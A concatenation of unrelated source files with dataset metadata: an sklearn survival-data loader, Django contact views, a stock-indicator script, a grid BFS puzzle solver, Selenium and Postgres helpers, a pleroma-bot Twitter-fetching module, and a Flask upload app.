def load_skl_dogs_2016(NApolicy='drop', dropColumns=dropNonNumeric+dropIrrelevant+dropDead+dropDates, censoringPolicy='none', newFeats=True, scaler=None, outlier_detector=None, censSVR=False):
# If the results will have to be trated with a censored SVR, don't drop "Dead" column
dropCols = dropColumns
if censSVR:
if "Dead" in dropCols:
dropCols.remove("Dead")
data = load_df_dogs_2016(NApolicy = NApolicy, dropColumns = dropCols, censoringPolicy=censoringPolicy, newFeats=newFeats)
if outlier_detector is not None:
y_outliers = outlier_detector.fit_predict(data.as_matrix())
data["Outlier"] = pd.Series(y_outliers)
data.drop(data[data["Outlier"]<1].index, inplace=True)
data.drop("Outlier", axis="columns", inplace=True)
#Target column
targetArray = data.loc[:, "Survival time"].as_matrix()
data.drop("Survival time", axis="columns", inplace=True)
#If censSVR, make sure the "Dead" column is the last of the data matrix
if censSVR:
cols = list(data.columns)
cols.remove("Dead")
cols.append("Dead")
data = data[cols]
featureNames = list(data.columns)
dataMatrix = data.as_matrix()
if scaler is not None:
dataMatrix = scaler.fit_transform(dataMatrix)
return Bunch(feature_names = featureNames, data = dataMatrix, target = targetArray)
| elvisnava/svm-thesis | experiments/datasets/dogs_2006_2016.py | dogs_2006_2016.py | py | 6,959 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.read_excel",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.str",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "numpy.int",
"lin... |
7409463239 | from django.http import Http404
from django.shortcuts import render, redirect
from django.db import IntegrityError
from contact_manager.models import Contact, Country
from contact_manager.forms import CountryModelForm
def c_form(request):
if request.method == 'GET':
template = 'contact.html'
x = Contact.objects.all()
print(x)
data = {'contact_list': x}
return render(request, template, data)
elif request.method == 'POST':
name = request.POST['name']
mobile = request.POST['mobile']
email = request.POST['email']
if len(name) > 3 and 10 <= len(mobile):
x = Contact(name=name, mobile=mobile, email=email)
x.save()
return redirect('c_home')
else:
return Http404("Error: Invalid Entry")
def c_form_edit(request, contact_id):
try:
x = Contact.objects.get(id=contact_id)
except Contact.DoesNotExsist:
return redirect('c_form')
else:
if request.method == 'GET':
template = 'contact.html'
x = Contact.objects.get(id=contact_id)
data = {'contact_list': Contact.objects.order_by('name'), 'edit_data': x}
return render(request, template, data)
elif request.method == 'POST':
x = Contact.objects.get(id=contact_id)
x.name = request.POST['name']
x.mobile = request.POST['mobile']
x.email = request.POST['email']
x.save()
return redirect('c_home')
def c_form_delete(contact_id):
try:
x = Contact.objects.get(id=contact_id)
except Contact.DoesNotExsist:
return redirect('c_home')
else:
x.delete()
return redirect('c_form')
def c_forms_form(request):
if request.method == 'GET':
template = 'country_form.html'
data = {'form': CountryModelForm, 'country_list': Country.objects.all()}
return render(request, template, data)
elif request.method == 'POST':
form = CountryModelForm(request.POST)
if form.is_valid():
fx = form.cleaned_data
x = Country(
name=fx['name'],
capital=fx['capital'],
population=fx['population'],
sea=fx['sea'],
currency=fx['currency'],
)
try:
x.save()
except IntegrityError:
return Http404("Integrity Error")
else:
return redirect('c_home')
else:
template = 'country_form.html'
data = {'form': CountryModelForm(), 'country_list': Country.objects.all()}
return render(request, template, data)
| SRI-VISHVA/Django_Basic | django1/contact_manager/views.py | views.py | py | 2,829 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "contact_manager.models.Contact.objects.all",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "contact_manager.models.Contact.objects",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "contact_manager.models.Contact",
"line_number": 12,
... |
86452313478 | import algorithm
import pandas as pd
from pymongo import MongoClient
import pymongo
client = MongoClient('localhost', 27017)
db = client['tushare']
data = db.history_data.find({'code':'600446'}).sort([("date", pymongo.ASCENDING)])
df = pd.DataFrame(list(data))
prices = df['close'].values
print(prices[-1])
sma5 = algorithm.sma(prices,5)
sma5.reverse()
print(sma5)
diff, dea, cd = algorithm.macd(prices)
diff.reverse()
print(diff)
| justquant/dataimport | test.py | test.py | py | 463 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pymongo.ASCENDING",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "algorithm.s... |
14065733809 | from itertools import combinations
from collections import deque
N, M = map(int, input().split())
room = []
vir_l = []
for n in range(N):
room.append(list(map(int, input().split())))
for m in range(N):
if room[n][m] == 2:
vir_l.append((n,m))
d_v = [(-1,-1), (-1,0), (-1,1), (0,-1), (0,1), (1,-1), (1,0), (1,1)]
around_n = []
for x, y in vir_l:
around = 0
for direction in d_v:
nx = x + direction[0]
ny = y + direction[1]
if nx in range(N) and ny in range(N) and (room[nx][ny] == 0 or room[nx][ny] == 2):
around += 1
around_n.append((around,x,y))
around_n = sorted(around_n, key=lambda x : x[0], reverse = True)
com = []
for ar in around_n:
com.append((ar[1],ar[2]))
if len(com) == 10:
break
active_combi = combinations(com, M)
d=[(0, 1), (0, -1), (1, 0), (-1, 0)]
def bfs():
visited = []
while vir_queue:
x, y, sec = vir_queue.popleft()
visited.append((x,y))
for k in range(4):
nx = x + d[k][0]
ny = y + d[k][1]
if (nx,ny) not in visited and nx in range(N) and ny in range(N) and (room1[nx][ny] == 0 or room1[nx][ny] == 2):
room1[nx][ny] = sec + 1
vir_queue.append((nx, ny, sec + 1))
return sec
min_time = N*N
for combi in active_combi:
room1 = [row[:] for row in room]
cnt_zero = 0
for row in room1:
cnt_zero += row.count(0)
if cnt_zero == 0:
min_time = 0
break
vir_queue =deque()
for point in combi:
x, y = point
vir_queue.append((x,y,0))
room1[x][y] = 0
time = bfs()
cnt_zero = 0
for row in room1:
cnt_zero += row.count(0)
if cnt_zero == M and time < min_time:
min_time = time
if min_time == N*N:
print(-1)
else:
print(min_time) | yeon-june/BaekJoon | 17142_plus.py | 17142_plus.py | py | 1,863 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.combinations",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 61,
"usage_type": "call"
}
] |
14841863301 | class CRM_loggin:
def loggin(self,username,pwd):
##CRM系系统打开url及登录
from selenium import webdriver
import time
driver = webdriver.Chrome()
driver.maximize_window()
self.driver = driver
self.driver.get('http://localhost:8080/crm/')
self.driver.find_element_by_name('userNum').send_keys(username)
self.driver.find_element_by_name('userPw').send_keys(pwd)
self.driver.find_element_by_id('in1').click()
def change_frame1(self,framename,num):
#跳转到指定frame
self.driver.switch_to.default_content()
self.driver.switch_to.frame(self.driver.find_elements_by_tag_name(framename)[num])
| crushrmsl/crush | crmTestSuite2/public/crmlogin.py | crmlogin.py | py | 713 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 6,
"usage_type": "name"
}
] |
71778088424 | import psycopg2
import pandas as pd
from sqlalchemy import create_engine
from Services.ConfigParser import ConfigParser
class Postgres:
def __init__(self):
config = ConfigParser()
db_config = config.DbConfigSettings()
self.connection_string = "postgresql://" + db_config["username"] + ":" + db_config["password"] + "@" + db_config["host"] + "/" + db_config["databaseName"]
def LoadFromDataFrame(self, data, tableName, boolReplace):
if (boolReplace):
exists = 'replace'
else:
exists = 'append'
db = create_engine(self.connection_string)
conn = db.connect()
df = pd.DataFrame(data)
df.to_sql(tableName, con=conn, if_exists=exists, index=False)
conn = psycopg2.connect(self.connection_string)
conn.autocommit = True
conn.close()
def GetData(self, query):
conn = psycopg2.connect(self.connection_string)
cur = conn.cursor()
cur.execute(query)
records = cur.fetchall()
conn.commit()
conn.close()
return records
| rohitdureja80/youtube-analytics | Database/Postgres.py | Postgres.py | py | 1,120 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Services.ConfigParser.ConfigParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.create_engine",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 19,
"usage_type": "call"
},
{
"api_n... |
13102044092 | import time
import json
import requests
from tqdm import tqdm
from datetime import datetime, timezone
from . import logger
from pleroma_bot.i18n import _
# from pleroma_bot._utils import spinner
def twitter_api_request(self, method, url,
params=None, data=None, headers=None, cookies=None,
files=None, auth=None, timeout=None, proxies=None,
hooks=None, allow_redirects=True, stream=None,
verify=None, cert=None, json=None, retries=0):
response = requests.request(
method=method.upper(),
url=url,
headers=headers,
files=files,
data=data or {},
json=json,
params=params or {},
auth=auth,
cookies=cookies,
hooks=hooks,
)
max_retries = 5
if response.status_code == 429:
remaining_header = response.headers.get('x-rate-limit-remaining')
reset_header = response.headers.get('x-rate-limit-reset')
limit_header = response.headers.get('x-rate-limit-limit')
if self.guest: # pragma: todo
logger.warning(
_(
"Rate limit exceeded when using a guest token. "
"Refreshing token and retrying..."
)
)
guest_token, headers = self._get_guest_token_header()
self.twitter_token = guest_token
self.header_twitter = headers
response = requests.request(
method=method.upper(),
url=url,
headers=headers,
files=files,
data=data or {},
json=json,
params=params or {},
auth=auth,
cookies=cookies,
hooks=hooks,
)
if response.status_code == 429 and self.proxy:
logger.warning(
_(
"Rate limit exceeded when using a guest token. "
"Retrying with a proxy..."
)
)
retries += 1
if retries <= max_retries:
response = self._request_proxy(
method, url, params=params,
data=data, headers=headers,
cookies=cookies, files=files,
auth=auth, hooks=hooks,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
stream=stream, verify=verify,
cert=cert, json=json, retries=retries
)
elif remaining_header and reset_header and limit_header:
limit = int(limit_header)
remaining = int(remaining_header)
reset = int(reset_header)
reset_time = datetime.utcfromtimestamp(reset)
logger.info(_(
"Rate limit exceeded. {} out of {} requests remaining until {}"
" UTC"
).format(remaining, limit, reset_time))
delay = (reset_time - datetime.utcnow()).total_seconds() + 2
logger.info(_("Sleeping for {}s...").format(round(delay)))
time.sleep(delay)
response = self.twitter_api_request(
method, url, params=params,
data=data, headers=headers,
cookies=cookies, files=files,
auth=auth, hooks=hooks,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
stream=stream, verify=verify,
cert=cert, json=json
)
elif response.status_code == 503 and retries <= max_retries: # pragma
retries += 1
logger.warning(
_(
"Received HTTP 503 - {}"
" Retrying... {}/{}"
).format(response.text, retries, max_retries)
)
time.sleep(0.5 * retries)
response = self.twitter_api_request(
method, url, params=params,
data=data, headers=headers,
cookies=cookies, files=files,
auth=auth, hooks=hooks,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
stream=stream, verify=verify,
cert=cert, json=json, retries=retries
)
return response
def _get_twitter_info_guest(self): # pragma: todo
from pleroma_bot._processing import _expand_urls
for t_user in self.twitter_username:
twitter_user_url = (
f"{self.twitter_base_url}"
f"/users/show.json?screen_name="
f"{t_user}"
)
response = requests.get(
twitter_user_url, headers=self.header_twitter, auth=self.auth
)
if not response.ok:
response.raise_for_status()
user_twitter = response.json()
bio_text = user_twitter["description"]
# Expand bio urls if possible
if self.twitter_bio:
bio_short = user_twitter["description"]
bio = {'text': user_twitter["description"], 'entities': None}
bio_long = _expand_urls(self, bio)
max_len = self.max_post_length
len_bio = len(f"{self.bio_text['_generic_bio_text']}{bio_long}")
bio_text = bio_long if len_bio < max_len else bio_short
self.bio_text[t_user] = (
f"{self.bio_text['_generic_bio_text']}{bio_text}"
if self.twitter_bio
else f"{self.bio_text['_generic_bio_text']}"
)
# Check if user has profile image
if "profile_image_url_https" in user_twitter.keys():
profile_img = user_twitter["profile_image_url_https"]
self.profile_image_url[t_user] = profile_img
# Check if user has banner image
if "profile_banner_url" in user_twitter.keys():
base_banner_url = user_twitter["profile_banner_url"]
self.profile_banner_url[t_user] = f"{base_banner_url}/1500x500"
self.display_name[t_user] = user_twitter["name"]
self.twitter_ids[user_twitter["id"]] = user_twitter["screen_name"]
if "entities" in user_twitter:
if "url" in user_twitter["entities"]:
wb = user_twitter["entities"]["url"]["urls"][0]["expanded_url"]
self.website = wb
if "pinned_tweet_ids" in user_twitter:
if len(user_twitter["pinned_tweet_ids_str"]) > 0:
self.pinned_tweet_id = user_twitter["pinned_tweet_ids_str"][0]
else:
self.pinned_tweet_id = None
def _get_twitter_info(self):
"""Updates User object attributes with current Twitter info
This includes:
* Bio text
* Profile image url
* Banner image url
* Screen name
:return: None
"""
from pleroma_bot._processing import _expand_urls
if self.archive:
return
if self.guest: # pragma: todo
self._get_twitter_info_guest()
return
for t_user in self.twitter_username:
url = f"{self.twitter_base_url_v2}/users/by/username/{t_user}"
params = {}
params.update(
{
"user.fields": "created_at,description,entities,id,location,"
"name,pinned_tweet_id,profile_image_url,"
"protected,url,username,verified,withheld",
"expansions": "pinned_tweet_id",
"tweet.fields": "attachments,author_id,"
"context_annotations,conversation_id,"
"created_at,entities,"
"geo,id,in_reply_to_user_id,lang,"
"public_metrics,"
"possibly_sensitive,referenced_tweets,"
"source,text,"
"withheld",
}
)
response = self.twitter_api_request(
'GET',
url,
headers=self.header_twitter,
auth=self.auth,
params=params
)
if not response.ok:
response.raise_for_status()
user = response.json()["data"]
bio_text = user["description"]
# Expand bio urls if possible
if self.twitter_bio:
user_entities = user["entities"] if "entities" in user else None
bio_short = user["description"]
bio = {'text': user['description'], 'entities': user_entities}
bio_long = _expand_urls(self, bio)
max_len = self.max_post_length
len_bio = len(f"{self.bio_text['_generic_bio_text']}{bio_long}")
bio_text = bio_long if len_bio < max_len else bio_short
self.bio_text[t_user] = (
f"{self.bio_text['_generic_bio_text']}{bio_text}"
if self.twitter_bio
else f"{self.bio_text['_generic_bio_text']}"
)
# Get website
if "entities" in user and "url" in user["entities"]:
self.website = user['entities']['url']['urls'][0]['expanded_url']
# Check if user has profile image
if "profile_image_url" in user.keys():
# Get the highest quality possible
profile_img_url = user["profile_image_url"].replace("_normal", "")
self.profile_image_url[t_user] = profile_img_url
self.display_name[t_user] = user["name"]
self.twitter_ids[user["id"]] = user["username"]
# TODO: Migrate to v2 when profile_banner is available users endpoint
twitter_user_url = (
f"{self.twitter_base_url}"
f"/users/show.json?screen_name="
f"{t_user}"
)
response = self.twitter_api_request(
'GET',
twitter_user_url,
headers=self.header_twitter,
auth=self.auth
)
if not response.ok:
response.raise_for_status()
user = response.json()
# Check if user has banner image
if "profile_banner_url" in user.keys():
base_banner_url = user["profile_banner_url"]
self.profile_banner_url[t_user] = f"{base_banner_url}/1500x500"
return
def _package_tweet_v2(tweet_v1): # pragma: todo
include_users = None
entities = None
tweet_v1["text"] = tweet_v1["full_text"]
tweet_v1["id"] = str(tweet_v1["id"])
date_twitter = datetime.strftime(
datetime.strptime(
tweet_v1["created_at"], '%a %b %d %H:%M:%S +0000 %Y'
),
'%Y-%m-%dT%H:%M:%S.000Z'
)
tweet_v1["created_at"] = date_twitter
if "possibly_sensitive" not in tweet_v1.keys():
tweet_v1["possibly_sensitive"] = False
if "user_id_str" in tweet_v1.keys():
tweet_v1["author_id"] = tweet_v1["user_id_str"]
if "user" in tweet_v1.keys():
tweet_v1["author_id"] = tweet_v1["user"]["id_str"]
retweet_id = None
quote_id = None
reply_id = None
if "user" in tweet_v1.keys():
tweet_v1["user"]["id"] = tweet_v1["user"]["id_str"]
tweet_v1["user"]["username"] = tweet_v1["user"]["screen_name"]
include_users = [tweet_v1["user"]]
if "retweeted_status_id_str" in tweet_v1.keys():
retweet_id = tweet_v1["retweeted_status_id_str"]
if "quoted_status_id_str" in tweet_v1.keys():
quote_id = tweet_v1["quoted_status_id_str"]
if "in_reply_to_status_id_str" in tweet_v1.keys():
reply_id = tweet_v1["in_reply_to_status_id_str"]
if quote_id or reply_id or retweet_id:
tweet_v1["referenced_tweets"] = []
if retweet_id:
rt = {"id": retweet_id, "type": "retweeted"}
tweet_v1["referenced_tweets"].append(rt)
if reply_id:
reply = {"id": reply_id, "type": "replied_to"}
tweet_v1["referenced_tweets"].append(reply)
if quote_id:
quoted_tw = {"id": quote_id, "type": "quoted"}
tweet_v1["referenced_tweets"].append(quoted_tw)
if "entities" in tweet_v1:
entities = tweet_v1["entities"]
card = {}
tweet_v1["polls"] = {}
if "card" in tweet_v1.keys():
tw_card = tweet_v1["card"]
if "binding_values" in tw_card.keys():
b_v = tw_card["binding_values"]
if tw_card["name"].startswith("poll"):
k = "string_value"
poll_opts = [b_v[c][k] for c in b_v if c.endswith("_label")]
duration = b_v['duration_minutes']['string_value']
pleroma_poll = {
"options": poll_opts,
"expires_in": int(duration) * 60,
}
tweet_v1["polls"] = pleroma_poll
if "unified_card" in b_v.keys():
u_c = b_v["unified_card"]
if "string_value" in u_c:
card = json.loads(u_c["string_value"])
if "destination_objects" in card:
try:
d_o = card["destination_objects"]
b_1 = d_o["browser_1"]
dt = b_1["data"]
url_dt = dt["url_data"]
url = url_dt["url"]
tweet_v1["text"] = f'{tweet_v1["text"]}\n{url}'
except KeyError:
pass
if "media_entities" in card.keys():
if "extended_entities" not in tweet_v1.keys():
tweet_v1.update({"extended_entities": {}})
tw_ext_entities = tweet_v1["extended_entities"]
if "media" not in tw_ext_entities:
tw_ext_entities.update({"media": []})
if "media" not in entities:
if entities is None:
entities = {"media": []}
else:
entities.update({"media": []})
for media in card['media_entities']:
entities["media"].append(card['media_entities'][media])
tw_ext_entities["media"].append(card['media_entities'][media])
return include_users, entities, tweet_v1
def _package_tweets_v2(tweets_v1, author_ids): # pragma: todo
tweets = {"data": [], "includes": {}}
if isinstance(tweets_v1, dict):
include_users, entities, tweet_v2 = _package_tweet_v2(tweets_v1)
tweets["data"] = tweets_v1
if include_users:
tweets["includes"]["users"] = include_users
if entities:
for entity in entities:
tweets["includes"][entity] = tweet_v2["entities"][entity]
else:
for tweet_v1 in tweets_v1:
if tweet_v1["user_id"] not in author_ids:
continue
include_users, entities, tweet_v2 = _package_tweet_v2(tweet_v1)
tweets["data"].append(tweet_v2)
if include_users:
tweets["includes"]["users"] = include_users
if entities:
for entity in entities:
tweets["includes"][entity] = tweet_v2["entities"][entity]
tweets["data"] = sorted(
tweets["data"], key=lambda i: i["id"], reverse=True
)
tweets["meta"] = {"result_count": len(tweets["data"])}
return tweets
def _get_tweets(
self,
version: str,
tweet_id=None,
start_time=None,
t_user=None,
pbar=None):
"""Gathers last 'max_tweets' tweets from the user and returns them
as a dict
:param version: Twitter API version to use to retrieve the tweets
:type version: string
:param tweet_id: Tweet ID to retrieve
:type tweet_id: int
:returns: last 'max_tweets' tweets
:rtype: dict
"""
if version == "v1.1" or self.guest:
if tweet_id:
twitter_status_url = (
f"{self.twitter_base_url}/statuses/"
f"show.json?id={str(tweet_id)}"
)
param = {
"include_profile_interstitial_type": "1",
"include_blocking": "1",
"include_blocked_by": "1",
"include_followed_by": "1",
"include_want_retweets": "1",
"include_mute_edge": "1",
"include_can_dm": "1",
"include_can_media_tag": "1",
"skip_status": "1",
"cards_platform": "Web-12",
"include_cards": "1",
"include_ext_alt_text": "true",
"include_quote_count": "true",
"include_reply_count": "1",
"tweet_mode": "extended",
"include_entities": "true",
"include_user_entities": "true",
"include_ext_media_color": "true",
"include_ext_media_availability": "true",
"send_error_codes": "true",
"simple_quoted_tweet": "true",
"query_source": "typed_query",
"spelling_corrections": "1",
"ext": "mediaStats,highlightedLabel",
}
if self.guest: # pragma: todo
param.update({"pc": "1"})
response = self.twitter_api_request(
'GET',
twitter_status_url,
params=param,
headers=self.header_twitter,
auth=self.auth
)
if not response.ok:
if response.status_code == 404: # pragma: todo
logger.warning(
_(
"Received HTTP 404 when trying to get tweet."
" Tweet deleted? Skipping..."
)
)
return None
response.raise_for_status()
tweet = response.json()
if self.guest: # pragma: todo
tweet_v2 = _package_tweets_v2(tweet, self.twitter_ids)
tweet = tweet_v2
return tweet
else:
for t_user in self.twitter_username:
if not self.guest:
twitter_status_url = (
f"{self.twitter_base_url}"
f"/statuses/user_timeline.json?screen_name="
f"{t_user}"
f"&count={str(self.max_tweets)}&include_rts=true"
)
response = self.twitter_api_request(
'GET',
twitter_status_url,
headers=self.header_twitter,
auth=self.auth
)
if not response.ok:
response.raise_for_status()
tweets = response.json()
else: # pragma: todo
now_ts = int(datetime.now(tz=timezone.utc).timestamp())
fmt_date = ("%Y-%m-%dT%H:%M:%S.%fZ", "%Y-%m-%dT%H:%M:%SZ")
for fmt in fmt_date:
try:
start_time_ts = int(datetime.strptime(
start_time, fmt
).replace(tzinfo=timezone.utc).timestamp())
except ValueError:
pass
rts = ""
if self.include_rts:
rts = "include:nativeretweets"
query = (
f"(from:{t_user}) "
f"since_time:{start_time_ts} until_time:{now_ts} {rts}"
)
param = {
"include_profile_interstitial_type": "1",
"include_rts": {str(self.include_rts).lower()},
"include_replies": {str(self.include_replies).lower()},
"include_quotes": {str(self.include_quotes).lower()},
"include_blocking": "1",
"include_blocked_by": "1",
"include_followed_by": "1",
"include_want_retweets": "1",
"include_mute_edge": "1",
"include_can_dm": "1",
"include_can_media_tag": "1",
"skip_status": "1",
"cards_platform": "Web-12",
"include_cards": "1",
"include_ext_alt_text": "true",
"include_quote_count": "true",
"include_reply_count": "1",
"tweet_mode": "extended",
"include_entities": "true",
"include_user_entities": "true",
"include_ext_media_color": "true",
"include_ext_media_availability": "true",
"send_error_codes": "true",
"simple_quoted_tweet": "true",
"q": query,
"count": str(self.max_tweets),
"query_source": "typed_query",
"pc": "1",
"spelling_corrections": "1",
"ext": "mediaStats,highlightedLabel",
"tweet_search_mode": "live",
}
tweets_guest = self._get_tweets_guest(param, pbar)
tweets = []
for tweet in tweets_guest:
tweets.append(tweets_guest[tweet])
tweets_v2 = _package_tweets_v2(tweets, self.twitter_ids)
tweets = tweets_v2
return tweets
elif version == "v2":
tweets_v2 = self._get_tweets_v2(
tweet_id=tweet_id, start_time=start_time, t_user=t_user, pbar=pbar
)
return tweets_v2
else:
raise ValueError(_("API version not supported: {}").format(version))
def _get_tweets_guest(
self, param=None, pbar=None, tweets=None, retries=None
): # pragma: todo
if tweets is None:
tweets = {}
if retries is None:
retries = 0
max_retries = 5
search_url = (
"https://twitter.com/i/api/2/search/adaptive.json"
)
response = self.twitter_api_request(
'GET',
search_url,
headers=self.header_twitter,
params=param,
)
resp_json = response.json()
tweets_guest = resp_json["globalObjects"]["tweets"]
insts = resp_json['timeline']['instructions']
entries = None
cursor = None
direction = "bottom"
for idx, inst in enumerate(insts):
if "addEntries" in insts[idx]:
entries = insts[idx]["addEntries"]["entries"]
elif "replaceEntry" in insts[idx]:
entry = insts[idx]["replaceEntry"]["entry"]
if entry['entryId'].startswith(f"sq-cursor-{direction}"):
entries = [entry]
if entries:
for idx, entry in enumerate(entries):
if entry['entryId'].startswith(f"sq-cursor-{direction}"):
cursor = entry["content"]["operation"]["cursor"]["value"]
self.result_count += len(tweets_guest)
if pbar:
pbar.update(len(tweets_guest))
tweets.update(tweets_guest)
if cursor:
if "cursor" in param:
if param["cursor"] == cursor or len(tweets_guest) == 0:
retries += 1
param.update({"cursor": cursor})
if retries <= max_retries:
tweets_guest = self._get_tweets_guest(param, pbar, tweets, retries)
tweets.update(tweets_guest)
return tweets
def _get_tweets_v2(
self,
start_time,
tweet_id=None,
next_token=None,
previous_token=None,
count=0,
tweets_v2=None,
t_user=None,
pbar=None
):
if not (3200 >= self.max_tweets >= 10):
global _
error_msg = _(
"max_tweets must be between 10 and 3200. max_tweets: {}"
).format(self.max_tweets)
raise ValueError(error_msg)
params = {}
previous_token = next_token
max_tweets = self.max_tweets
diff = max_tweets - count
if diff == 0 or diff < 0:
return tweets_v2
# Tweet number must be between 10 and 100 for search
if count:
max_results = diff if diff < 100 else 100
else:
max_results = max_tweets if 100 > self.max_tweets > 10 else 100
# round up max_results to the nearest 10
max_results = (max_results + 9) // 10 * 10
if tweet_id:
url = f"{self.twitter_base_url_v2}/tweets/{tweet_id}"
params.update(
{
"poll.fields": "duration_minutes,end_datetime,id,options,"
"voting_status",
"media.fields": "duration_ms,height,media_key,"
"preview_image_url,type,url,width,"
"public_metrics,alt_text",
"expansions": "attachments.poll_ids,"
"attachments.media_keys,author_id,"
"entities.mentions.username,geo.place_id,"
"in_reply_to_user_id,referenced_tweets.id,"
"referenced_tweets.id.author_id",
"tweet.fields": "attachments,author_id,"
"context_annotations,conversation_id,"
"created_at,entities,"
"geo,id,in_reply_to_user_id,lang,"
"public_metrics,"
"possibly_sensitive,referenced_tweets,"
"source,text,"
"withheld",
}
)
response = self.twitter_api_request(
'GET',
url,
headers=self.header_twitter,
auth=self.auth,
params=params
)
if not response.ok:
response.raise_for_status()
response = response.json()
return response
else:
params.update({"max_results": max_results})
url = (
f"{self.twitter_base_url_v2}/users/by?"
f"usernames={t_user}"
)
response = self.twitter_api_request(
'GET', url, headers=self.header_twitter, auth=self.auth
)
if not response.ok:
response.raise_for_status()
response = response.json()
twitter_user_id = response["data"][0]["id"]
url = f"{self.twitter_base_url_v2}/users/{twitter_user_id}/tweets"
if next_token:
params.update({"pagination_token": next_token})
params.update(
{
"start_time": start_time,
}
)
params.update(
{
"poll.fields": "duration_minutes,end_datetime,id,options,"
"voting_status",
"media.fields": "duration_ms,height,media_key,"
"preview_image_url,type,url,width,"
"public_metrics,alt_text",
"expansions": "attachments.poll_ids,"
"attachments.media_keys,author_id,"
"entities.mentions.username,geo.place_id,"
"in_reply_to_user_id,referenced_tweets.id,"
"referenced_tweets.id.author_id",
"tweet.fields": "attachments,author_id,"
"context_annotations,conversation_id,"
"created_at,entities,"
"geo,id,in_reply_to_user_id,lang,"
"public_metrics,"
"possibly_sensitive,referenced_tweets,"
"source,text,"
"withheld",
}
)
response = self.twitter_api_request(
'GET', url, headers=self.header_twitter, params=params, auth=self.auth
)
if not response.ok:
response.raise_for_status()
if tweets_v2:
# TODO: Tidy up this mess
next_tweets = response.json()
includes = ["users", "tweets", "media", "polls"]
for include in includes:
try:
_ = tweets_v2["includes"][include]
except KeyError:
tweets_v2["includes"].update({include: []})
try:
_ = next_tweets["includes"][include]
except KeyError:
next_tweets["includes"].update({include: []})
for tweet in next_tweets["data"]:
tweets_v2["data"].append(tweet)
for user in next_tweets["includes"]["users"]:
tweets_v2["includes"]["users"].append(user)
for tweet_include in next_tweets["includes"]["tweets"]:
tweets_v2["includes"]["tweets"].append(tweet_include)
for media in next_tweets["includes"]["media"]:
tweets_v2["includes"]["media"].append(media)
for poll in next_tweets["includes"]["polls"]:
tweets_v2["includes"]["polls"].append(poll)
tweets_v2["meta"] = next_tweets["meta"]
else:
tweets_v2 = response.json()
if pbar:
pbar.update(response.json()["meta"]["result_count"])
try:
next_token = response.json()["meta"]["next_token"]
count += response.json()["meta"]["result_count"]
if next_token and next_token != previous_token:
self._get_tweets_v2(
start_time=start_time,
tweets_v2=tweets_v2,
next_token=next_token,
previous_token=previous_token,
count=count,
t_user=t_user,
pbar=pbar
)
except KeyError:
pass
return tweets_v2
# @spinner(_("Gathering tweets... "))
def get_tweets(self, start_time):
from .i18n import _
t_utweets = {}
self.result_count = 0
tweets_merged = {
"data": [],
"includes": {},
}
try:
for t_user in self.twitter_username:
desc = _("Gathering tweets... ")
fmt = '{desc}{n_fmt}'
pbar = tqdm(desc=desc, position=0, total=10000, bar_format=fmt)
t_utweets[t_user] = self._get_tweets(
"v2",
start_time=start_time,
t_user=t_user,
pbar=pbar
)
pbar.close()
self.result_count += t_utweets[t_user]["meta"]["result_count"]
tweets_merged["meta"] = {}
for user in t_utweets:
includes = ["users", "tweets", "media", "polls"]
for include in includes:
try:
_ = t_utweets[user]["includes"][include]
except KeyError:
t_utweets[user]["includes"].update({include: []})
_ = t_utweets[user]["includes"][include]
for include in includes:
try:
_ = tweets_merged["includes"][include]
except KeyError:
tweets_merged["includes"].update({include: []})
_ = tweets_merged["includes"][include]
tweets_merged["data"].extend(t_utweets[user]["data"])
for in_user in t_utweets[user]["includes"]["users"]:
tweets_merged["includes"]["users"].append(in_user) # pragma
for tweet_include in t_utweets[user]["includes"]["tweets"]:
tweets_merged["includes"]["tweets"].append(tweet_include)
for media in t_utweets[user]["includes"]["media"]:
tweets_merged["includes"]["media"].append(media)
for poll in t_utweets[user]["includes"]["polls"]:
tweets_merged["includes"]["polls"].append(poll)
tweets_merged["meta"][user] = t_utweets[user]["meta"]
except KeyError:
pass
return tweets_merged
| robertoszek/pleroma-bot | pleroma_bot/_twitter.py | _twitter.py | py | 32,092 | python | en | code | 98 | github-code | 36 | [
{
"api_name": "requests.request",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pleroma_bot.i18n._",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "requests.request",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "pleroma_bot.i18n... |
15643367692 | from aurora import aurora
import os
import json
from flask import Flask, flash, request, redirect, url_for, render_template, Response
from werkzeug.utils import secure_filename
from db import db
UPLOAD_FOLDER = './sessions'
ALLOWED_EXTENSIONS = set(['zip','csv', 'txt', 'json'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
importer = aurora.SESSION_IMPORTER()
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
importer.run_import()
return redirect(url_for('index', filename=filename))
return render_template('index.html', title='Welcome')
